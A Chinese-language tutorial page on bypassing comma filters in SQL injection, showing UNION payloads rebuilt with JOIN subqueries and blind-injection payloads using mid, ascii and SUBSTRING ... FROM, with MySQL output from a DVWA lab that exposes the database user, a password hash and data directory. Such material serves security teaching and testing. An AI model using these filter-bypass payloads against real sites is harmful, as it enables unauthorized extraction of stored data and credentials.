主頁(yè) > 知識(shí)庫(kù) > SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析

SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析

熱門標(biāo)簽:泗洪正規(guī)電話機(jī)器人找哪家 小程序智能電話機(jī)器人 河北便宜電銷機(jī)器人軟件 簡(jiǎn)單的智能語(yǔ)音電銷機(jī)器人 怎么申請(qǐng)400熱線電話 湖南保險(xiǎn)智能外呼系統(tǒng)產(chǎn)品介紹 ai電話電話機(jī)器人 南昌呼叫中心外呼系統(tǒng)哪家好 怎么去開(kāi)發(fā)一個(gè)電銷機(jī)器人

前言

sql注入在很早很早以前是很常見(jiàn)的一個(gè)漏洞。后來(lái)隨著安全水平的提高,sql注入已經(jīng)很少能夠看到了。但是就在今天,還有很多網(wǎng)站帶著sql注入漏洞在運(yùn)行。下面這篇文章主要介紹了關(guān)于SQL注入逗號(hào)繞過(guò)的相關(guān)內(nèi)容,分享出來(lái)供大家參考學(xué)習(xí),下面話不多說(shuō)了,來(lái)一起看看詳細(xì)的介紹吧

1.聯(lián)合查詢顯注繞過(guò)逗號(hào)

在聯(lián)合查詢時(shí)使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位,語(yǔ)句中包含了多個(gè)逗號(hào),如果有WAF攔截了逗號(hào)時(shí),我們的聯(lián)合查詢不能用了。

繞過(guò)

在顯示位上替換為常見(jiàn)的注入變量或其它語(yǔ)句

union select 1,2,3;

union select * from ((select 1)A join (select 2)B join (select 3)C);

union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);

在數(shù)據(jù)庫(kù)中演示聯(lián)合查詢

UNION開(kāi)始是我們?cè)赨RL中注入的語(yǔ)句,這里只是演示,在實(shí)際中如果我們?cè)谧⑷胝Z(yǔ)句中有逗號(hào)就可能被攔截

mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

不出現(xiàn)逗號(hào),使用Join來(lái)注入

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

查詢我們想要的數(shù)據(jù)

mysql> select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(),' ',database(),' ',@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password   |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)

2.盲注中逗號(hào)繞過(guò)

MID 和substr 函數(shù)用于從文本字段中提取字符

mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)

查詢數(shù)據(jù)庫(kù)用戶名第一個(gè)字符的ascii碼

mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3  |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

盲注,通過(guò)猜ascii值

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

逗號(hào)繞過(guò)SUBTTRING 函數(shù)

substring(str FROM pos)

從字符串str的起始位置pos 返回一個(gè)子串

mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello  |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello  |
+---------------------------+
1 row in set (0.03 sec)

注入

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2)為o
//o的ascii為111,
mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password  |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)

總結(jié)

以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。

您可能感興趣的文章:
  • 防止xss和sql注入:JS特殊字符過(guò)濾正則
  • 一個(gè)過(guò)濾重復(fù)數(shù)據(jù)的 SQL 語(yǔ)句
  • MySQL注入繞開(kāi)過(guò)濾的技巧總結(jié)
  • SQL注入中繞過(guò) 單引號(hào) 限制繼續(xù)注入
  • SQL注入繞過(guò)的技巧總結(jié)
  • 多列復(fù)合索引的使用 繞過(guò)微軟sql server的一個(gè)缺陷
  • 關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)
  • SQL Server簡(jiǎn)單模式下誤刪除堆表記錄恢復(fù)方法(繞過(guò)頁(yè)眉校驗(yàn))
  • Mysql如何巧妙的繞過(guò)未知字段名詳解

標(biāo)簽:淮安 威海 瀘州 那曲 江蘇 柳州 景德鎮(zhèn) 荊門

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析》,本文關(guān)鍵詞  SQL,注入,技巧,之顯,注,與,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析的相關(guān)信息資訊供網(wǎng)民參考!
  • 企业400电话

    智能AI客服机器人
    15000

    在线订购

    合计11份范本:公司章程+合伙协议+出资协议+合作协议+股权转让协议+增资扩股协议+股权激励+股东会决议+董事会决议

    推薦文章